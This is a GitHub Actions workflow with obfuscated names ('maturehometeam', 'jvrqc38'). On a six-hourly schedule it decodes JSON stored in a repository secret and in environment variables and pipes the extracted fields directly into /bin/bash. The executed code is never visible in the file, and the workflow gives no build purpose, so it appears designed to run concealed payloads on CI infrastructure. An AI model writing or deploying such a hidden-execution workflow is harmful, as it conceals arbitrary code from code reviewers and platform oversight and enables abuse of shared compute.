name: maturehometeam
on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          jvrqc38: ${{ secrets.jvrqc38 }}
        run: |
          echo $jvrqc38 | jq -r .b134 | /bin/bash
          echo $wdr10637 | jq -r .orhj4 | /bin/bash
          echo $dbghs1442 | jq -r .gzfk0309 | /bin/bash

